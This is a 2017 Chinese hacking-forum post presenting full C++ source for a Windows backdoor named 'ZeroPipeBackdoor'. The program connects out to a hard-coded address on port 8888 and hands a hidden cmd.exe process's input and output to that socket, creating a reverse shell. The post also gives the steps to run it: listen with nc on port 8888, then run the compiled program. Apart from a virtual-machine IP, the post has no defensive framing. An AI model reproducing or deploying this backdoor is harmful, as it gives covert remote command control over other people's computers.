看流星社区

 找回密码
 注册账号
查看: 2029|回复: 0

零管道返回cmdshell

[复制链接]

该用户从未签到

发表于 2017-6-2 11:01:08 | 显示全部楼层 |阅读模式
零管道返回cmdshell




192.168.139.128[/code]为虚拟机的IP地址。

实验步骤:
1 在虚拟机中开启nc -l -v -p 8888进行监听
2. 运行编译好的程序
虚拟机就会得到实体机的cmd了....

// ZeroPipeBackdoor.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <winsock2.h>
#pragma comment(lib, "WS2_32.lib")        // 链接到WS2_32.lib

void cmdshell(SOCKET s)
{
        char szSysDir[MAX_PATH] = {0};
        GetSystemDirectory(szSysDir, MAX_PATH);
        strcat(szSysDir, "\\cmd.exe");

        STARTUPINFO si = {0};
        GetStartupInfo(&amp;si);
        si.wShowWindow = SW_HIDE;
        si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
        si.hStdInput = si.hStdOutput = si.hStdError = (void *)s;
       
        PROCESS_INFORMATION pi = {0};
        ::CreateProcess(NULL, szSysDir, NULL, NULL, true, 0, NULL, NULL, &amp;si, &amp;pi );
        ::WaitForSingleObject(pi.hProcess, INFINITE);

}


int main(int argc, char* argv[])
{
        char MyMessage[512] = {0};
        strcpy(MyMessage, "backdoor start");

        // 初始化WS2_32.dll
        WSADATA wsaData;
       
        WORD sockVersion = MAKEWORD(2, 2);
        if(::WSAStartup(sockVersion, &amp;wsaData) != 0)
        {
                return -1;
        }
        SOCKET        s = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
        if (s == INVALID_SOCKET)
        {
                return -1;
        }
        sockaddr_in sin;
        sin.sin_family = AF_INET;
        sin.sin_port = htons(8888);
        sin.sin_addr.S_un.S_addr = inet_addr("192.168.139.128");
        if ( connect(s, (sockaddr*)&amp;sin, sizeof(sin)) == -1 )
        {
                int nErr = GetLastError();
                return -1;
        }
        if (send(s, MyMessage, sizeof(MyMessage), 0) == SOCKET_ERROR)
        {
                printf("send error");
                return -1;
        }
        cmdshell(s);
        printf("Hello World!\n");
        return 0;
}
[/code]
[/code]
点击按钮快速添加回复内容: 支持 高兴 激动 给力 加油 苦寻 生气 回帖 路过 感恩
您需要登录后才可以回帖 登录 | 注册账号

本版积分规则

小黑屋|手机版|Archiver|看流星社区 |网站地图

GMT+8, 2024-3-19 11:19

Powered by Kanliuxing X3.4

© 2010-2019 kanliuxing.com

快速回复 返回顶部 返回列表